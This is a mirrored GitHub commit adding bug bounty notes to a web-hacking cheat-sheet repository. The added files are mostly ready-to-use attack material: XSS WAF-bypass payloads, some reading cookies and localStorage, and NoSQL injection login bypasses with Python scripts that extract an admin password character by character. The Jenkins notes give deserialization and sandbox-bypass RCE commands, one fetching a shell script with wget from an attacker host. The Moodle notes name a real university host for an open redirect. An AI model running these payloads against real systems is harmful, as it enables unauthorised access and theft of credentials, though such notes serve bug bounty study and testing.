mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
Major Update, adding some tips
This commit is contained in:
parent
a71bcdd231
commit
338475aee1
@ -1,5 +1,11 @@
|
|||||||
# 403 Forbidden Bypass
|
# 403 Forbidden Bypass
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403)
|
||||||
|
|
||||||
|
|
||||||
|
## Exploit
|
||||||
1. Using "X-Original-URL" header
|
1. Using "X-Original-URL" header
|
||||||
```
|
```
|
||||||
GET /admin HTTP/1.1
|
GET /admin HTTP/1.1
|
||||||
@ -21,15 +27,18 @@ Try this to bypass
|
|||||||
http://target.com/%2e/admin => 200
|
http://target.com/%2e/admin => 200
|
||||||
```
|
```
|
||||||
|
|
||||||
3. Try add dot (.) and slash (/) in the URL
|
3. Try add dot (.) slash (/) and semicolon (;) in the URL
|
||||||
```
|
```
|
||||||
http://target.com/admin => 403
|
http://target.com/admin => 403
|
||||||
```
|
```
|
||||||
Try this to bypass
|
Try this to bypass
|
||||||
```
|
```
|
||||||
http://target.com/admin/. => 200
|
http://target.com/secret/. => 200
|
||||||
http://target.com//admin// => 200
|
http://target.com//secret// => 200
|
||||||
http://target.com/./admin/./ => 200
|
http://target.com/./secret/.. => 200
|
||||||
|
http://target.com/;/secret => 200
|
||||||
|
http://target.com/.;/secret => 200
|
||||||
|
http://target.com//;//secret => 200
|
||||||
```
|
```
|
||||||
|
|
||||||
4. Add "..;/" after the directory name
|
4. Add "..;/" after the directory name
|
||||||
@ -58,4 +67,6 @@ Host: victim.com
|
|||||||
X-Original-URL: /admin
|
X-Original-URL: /admin
|
||||||
```
|
```
|
||||||
|
|
||||||
Source: [@iam_j0ker](https://twitter.com/iam_j0ker)
|
Source:
|
||||||
|
- [@iam_j0ker](https://twitter.com/iam_j0ker)
|
||||||
|
- [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web)
|
||||||
|
@ -336,5 +336,50 @@ javascript://%250Aalert(1)
|
|||||||
<!--><svg onload=alert(1)-->
|
<!--><svg onload=alert(1)-->
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Bypass WAF
|
||||||
|
1. Cloudflare
|
||||||
|
```
|
||||||
|
<svg%0Aonauxclick=0;[1].some(confirm)//
|
||||||
|
|
||||||
|
<svg onload=alert%26%230000000040"")>
|
||||||
|
|
||||||
|
<a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))>
|
||||||
|
<svg onx=() onload=(confirm)(1)>
|
||||||
|
|
||||||
|
<svg onx=() onload=(confirm)(document.cookie)>
|
||||||
|
|
||||||
|
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
|
||||||
|
|
||||||
|
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
||||||
|
|
||||||
|
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
|
||||||
|
|
||||||
|
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
||||||
|
|
||||||
|
"><onx=[] onmouseover=prompt(1)>
|
||||||
|
|
||||||
|
%2sscript%2ualert()%2s/script%2u -xss popup
|
||||||
|
|
||||||
|
<svg onload=alert%26%230000000040"1")>
|
||||||
|
|
||||||
|
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
|
||||||
|
|
||||||
|
[1].map(confirm)'ale'+'rt'()a	l	e	r	t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
|
||||||
|
|
||||||
|
<svg onload=prompt%26%230000000040document.domain)>
|
||||||
|
|
||||||
|
<svg onload=prompt%26%23x000000028;document.domain)>
|
||||||
|
|
||||||
|
<svg/onrandom=random onload=confirm(1)>
|
||||||
|
|
||||||
|
<video onnull=null onmouseover=confirm(1)>
|
||||||
|
|
||||||
|
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
|
||||||
|
|
||||||
|
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
|
||||||
|
|
||||||
|
<img ignored=() src=x onerror=prompt(1)>
|
||||||
|
```
|
||||||
|
|
||||||
Reference:
|
Reference:
|
||||||
- [Brute Logic](https://brutelogic.com.br/)
|
- [Brute Logic](https://brutelogic.com.br/)
|
@ -1,14 +1,14 @@
|
|||||||
# Broken Link Hijacking
|
# Broken Link Hijacking
|
||||||
## **Introduction**
|
|
||||||
Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page
|
|
||||||
|
|
||||||
## **How to Find**
|
## Tools
|
||||||
|
- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker)
|
||||||
|
|
||||||
|
## Definition
|
||||||
|
Broken Link Hijacking exists whenever a target links to an expired domain or page
|
||||||
|
|
||||||
|
## How to find
|
||||||
1. Manually find external links on the target site (For example, check some links to social media accounts)
|
1. Manually find external links on the target site (For example, check some links to social media accounts)
|
||||||
2. Try [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) tools to find broken link, this is the command
|
2. Try using tools to find broken link, for example using tools that listed in this readme
|
||||||
|
|
||||||
```
|
|
||||||
blc -rof --filter-level 3 https://vuln.com/
|
|
||||||
```
|
|
||||||
|
|
||||||
References:
|
References:
|
||||||
- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/)
|
- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/)
|
||||||
|
10
Misc/Exposed API keys.md
Normal file
10
Misc/Exposed API keys.md
Normal file
@ -0,0 +1,10 @@
|
|||||||
|
# Exposed API Keys
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
* [Key-Checker](https://github.com/daffainfo/Key-Checker)
|
||||||
|
|
||||||
|
## Definition
|
||||||
|
Sometimes in a web application, an attacker can find some exposed API keys which can lead to financial loss to a company.
|
||||||
|
|
||||||
|
## How to exploit
|
||||||
|
[keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys
|
@ -1 +1,143 @@
|
|||||||
# Soon!
|
## NoSQL injection
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
|
||||||
|
|
||||||
|
## Exploit
|
||||||
|
|
||||||
|
### Authentication Bypass
|
||||||
|
|
||||||
|
Basic authentication bypass using not equal ($ne) or greater ($gt)
|
||||||
|
|
||||||
|
```
|
||||||
|
in the request
|
||||||
|
- username[$ne]=toto&password[$ne]=toto
|
||||||
|
- login[$regex]=a.*&pass[$ne]=lol
|
||||||
|
- login[$gt]=admin&login[$lt]=test&pass[$ne]=1
|
||||||
|
- login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
|
||||||
|
```
|
||||||
|
|
||||||
|
```json
|
||||||
|
The output is
|
||||||
|
{"username": {"$ne": null}, "password": {"$ne": null}}
|
||||||
|
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
|
||||||
|
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
|
||||||
|
{"username": {"$gt":""}, "password": {"$gt":""}}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Extract length information
|
||||||
|
|
||||||
|
```json
|
||||||
|
username[$ne]=toto&password[$regex]=.{1}
|
||||||
|
username[$ne]=toto&password[$regex]=.{3}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Extract data information
|
||||||
|
|
||||||
|
```json
|
||||||
|
in URL
|
||||||
|
username[$ne]=toto&password[$regex]=m.{2}
|
||||||
|
username[$ne]=toto&password[$regex]=md.{1}
|
||||||
|
username[$ne]=toto&password[$regex]=mdp
|
||||||
|
|
||||||
|
username[$ne]=toto&password[$regex]=m.*
|
||||||
|
username[$ne]=toto&password[$regex]=md.*
|
||||||
|
|
||||||
|
in JSON
|
||||||
|
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
|
||||||
|
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
|
||||||
|
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Extract data with "in"
|
||||||
|
|
||||||
|
```json
|
||||||
|
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
|
||||||
|
```
|
||||||
|
|
||||||
|
### PHP Arbitrary Function Execution
|
||||||
|
```json
|
||||||
|
"user":{"$func": "var_dump"}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Blind NoSQL
|
||||||
|
|
||||||
|
### POST
|
||||||
|
|
||||||
|
```python
|
||||||
|
import requests
|
||||||
|
import urllib3
|
||||||
|
import string
|
||||||
|
import urllib
|
||||||
|
urllib3.disable_warnings()
|
||||||
|
|
||||||
|
username="admin"
|
||||||
|
password=""
|
||||||
|
u="http://example.org/login"
|
||||||
|
headers={'content-type': 'application/json'}
|
||||||
|
|
||||||
|
while True:
|
||||||
|
for c in string.printable:
|
||||||
|
if c not in ['*','+','.','?','|']:
|
||||||
|
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
|
||||||
|
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
|
||||||
|
if 'OK' in r.text or r.status_code == 302:
|
||||||
|
print("Found one more char : %s" % (password+c))
|
||||||
|
password += c
|
||||||
|
```
|
||||||
|
|
||||||
|
### GET
|
||||||
|
|
||||||
|
```python
|
||||||
|
import requests
|
||||||
|
import urllib3
|
||||||
|
import string
|
||||||
|
import urllib
|
||||||
|
urllib3.disable_warnings()
|
||||||
|
|
||||||
|
username='admin'
|
||||||
|
password=''
|
||||||
|
u='http://example.org/login'
|
||||||
|
|
||||||
|
while True:
|
||||||
|
for c in string.printable:
|
||||||
|
if c not in ['*','+','.','?','|', '#', '&', '$']:
|
||||||
|
payload='?username=%s&password[$regex]=^%s' % (username, password + c)
|
||||||
|
r = requests.get(u + payload)
|
||||||
|
if 'Yeah' in r.text:
|
||||||
|
print("Found one more char : %s" % (password+c))
|
||||||
|
password += c
|
||||||
|
```
|
||||||
|
|
||||||
|
Another example using sleep to check vuln or not
|
||||||
|
```
|
||||||
|
'%2bsleep(1)%2b'
|
||||||
|
```
|
||||||
|
|
||||||
|
### MongoDB Payloads
|
||||||
|
|
||||||
|
```bash
|
||||||
|
true, $where: '1 == 1'
|
||||||
|
, $where: '1 == 1'
|
||||||
|
$where: '1 == 1'
|
||||||
|
', $where: '1 == 1'
|
||||||
|
1, $where: '1 == 1'
|
||||||
|
{ $ne: 1 }
|
||||||
|
', $or: [ {}, { 'a':'a
|
||||||
|
' } ], $comment:'successful MongoDB injection'
|
||||||
|
db.injection.insert({success:1});
|
||||||
|
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|
||||||
|
|| 1==1
|
||||||
|
' && this.password.match(/.*/)//+%00
|
||||||
|
' && this.passwordzz.match(/.*/)//+%00
|
||||||
|
'%20%26%26%20this.password.match(/.*/)//+%00
|
||||||
|
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
|
||||||
|
{$gt: ''}
|
||||||
|
[$ne]=1
|
||||||
|
```
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [Hacktricks](https://book.hacktricks.xyz/pentesting-web/nosql-injection)
|
||||||
|
* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/NoSQL%20Injection/README.md)
|
13
OAuth Misconfiguration.md
Normal file
13
OAuth Misconfiguration.md
Normal file
@ -0,0 +1,13 @@
|
|||||||
|
# OAuth Misconfiguration
|
||||||
|
1. OAuth token stealing: Changing redirect_uri to attacker(.)com(Use IDN Homograph or common bypasses).
|
||||||
|
2. Change Referral header to attacker(.)com while requesting OAuth.
|
||||||
|
3. Create an account with victim@gmail(.)com with normal functionality. Create account with victim@gmail(.)com using OAuth functionality. Now try to login using previous credentials.
|
||||||
|
4. OAuth Token Re-use.
|
||||||
|
5. Missing or broken state parameter.
|
||||||
|
6. Lack of origin check.
|
||||||
|
7. Open Redirection on another endpoint > Use it in redirect_uri
|
||||||
|
8. If there is an email parameter after signin then try to change the email parameter to victim's one.
|
||||||
|
9. Try to remove email from the scope and add victim's email manually.
|
||||||
|
10. Only company's email is allowed? > Try to replace hd=company(.)com to hd=gmail(.)com
|
||||||
|
11. Check if its leaking client_secret parameter.
|
||||||
|
12. Go to the browser history and check if the token is there.
|
24
README.md
24
README.md
@ -1,18 +1,24 @@
|
|||||||
# All about bug bounty
|
# All about bug bounty
|
||||||
These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too!
|
These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too!
|
||||||
|
|
||||||
|
![](https://img.shields.io/github/issues/daffainfo/AllAboutBugBounty)
|
||||||
|
![](https://img.shields.io/github/forks/daffainfo/AllAboutBugBounty)
|
||||||
|
![](https://img.shields.io/github/stars/daffainfo/AllAboutBugBounty)
|
||||||
|
![](https://img.shields.io/github/last-commit/daffainfo/AllAboutBugBounty)
|
||||||
|
|
||||||
## List
|
## List
|
||||||
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
|
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
|
||||||
- SQL Injection (SOON)
|
|
||||||
- NoSQL Injection (SOON)
|
|
||||||
- Local File Inclusion (SOON)
|
|
||||||
- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
|
- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
|
||||||
- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
|
- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
|
||||||
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
|
|
||||||
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
|
|
||||||
- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
|
- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
|
||||||
- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md)
|
- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md)
|
||||||
- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
|
- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
|
||||||
|
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
|
||||||
|
- Local File Inclusion (SOON)
|
||||||
|
- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
|
||||||
|
- SQL Injection (SOON)
|
||||||
|
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
|
||||||
|
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
|
||||||
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
|
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
|
||||||
|
|
||||||
## List Bypass
|
## List Bypass
|
||||||
@ -28,7 +34,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
|
|
||||||
## List Framework
|
## List Framework
|
||||||
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md)
|
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md)
|
||||||
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.MD)
|
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.md)
|
||||||
|
|
||||||
## Miscellaneous
|
## Miscellaneous
|
||||||
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
|
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
|
||||||
@ -38,7 +44,11 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md)
|
- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md)
|
||||||
- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md)
|
- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md)
|
||||||
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
|
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
|
||||||
- [Unauthenticated Jira CVE](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
|
|
||||||
|
## Technologies
|
||||||
|
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
|
||||||
|
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
||||||
|
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
||||||
|
|
||||||
## Reconnaissance
|
## Reconnaissance
|
||||||
- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
|
- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
|
||||||
|
66
Technologies/Jenkins.md
Normal file
66
Technologies/Jenkins.md
Normal file
@ -0,0 +1,66 @@
|
|||||||
|
## Jenkins
|
||||||
|
1. Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
|
||||||
|
|
||||||
|
Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload.
|
||||||
|
Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py):
|
||||||
|
|
||||||
|
```bash
|
||||||
|
java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.sh' > payload.out
|
||||||
|
./jenkins_rce.py jenkins_ip jenkins_port payload.out
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)
|
||||||
|
|
||||||
|
Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html).
|
||||||
|
|
||||||
|
If the Jenkins requests authentication but returns valid data using the following request, it is vulnerable:
|
||||||
|
```bash
|
||||||
|
curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002)
|
||||||
|
|
||||||
|
Original RCE vulnerability [here](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html), full exploit [here](https://github.com/petercunha/jenkins-rce).
|
||||||
|
|
||||||
|
Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc).
|
||||||
|
|
||||||
|
4. CVE-2019-1003030
|
||||||
|
|
||||||
|
How to Exploit:
|
||||||
|
- [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html)
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {
|
||||||
|
public x(){
|
||||||
|
"ping -c 1 xx.xx.xx.xx".execute()
|
||||||
|
}
|
||||||
|
} HTTP/1.1
|
||||||
|
Host: 127.0.0.1
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
```
|
||||||
|
URL Encoding the following for RCE
|
||||||
|
```
|
||||||
|
public class x {
|
||||||
|
public x(){
|
||||||
|
"ping -c 1 xx.xx.xx.xx".execute()
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
to
|
||||||
|
|
||||||
|
%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
|
||||||
|
|
||||||
|
5. Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392)
|
||||||
|
|
||||||
|
How to exploit:
|
||||||
|
- [@jas502n](https://github.com/jas502n/CVE-2019-10392)
|
||||||
|
- [iwantmore.pizza](https://iwantmore.pizza/posts/cve-2019-10392.html)
|
||||||
|
|
||||||
|
Reference:
|
||||||
|
- https://github.com/gquere/pwn_jenkins
|
@ -60,3 +60,6 @@ Connection: close
|
|||||||
```
|
```
|
||||||
https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
|
https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Reference:
|
||||||
|
- https://twitter.com/harshbothra
|
12
Technologies/Moodle.md
Normal file
12
Technologies/Moodle.md
Normal file
@ -0,0 +1,12 @@
|
|||||||
|
# Moodle
|
||||||
|
|
||||||
|
1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter
|
||||||
|
```
|
||||||
|
https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter
|
||||||
|
|
||||||
|
```
|
||||||
|
https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
|
||||||
|
```
|
Loading…
Reference in New Issue
Block a user